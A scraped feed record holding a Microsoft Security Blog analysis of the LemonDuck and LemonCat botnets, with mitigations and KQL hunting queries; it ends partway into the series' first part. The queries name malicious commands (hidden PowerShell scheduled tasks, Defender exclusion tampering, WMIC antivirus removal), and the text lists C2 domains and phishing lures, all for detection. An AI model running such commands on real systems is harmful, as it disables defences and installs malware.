configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA 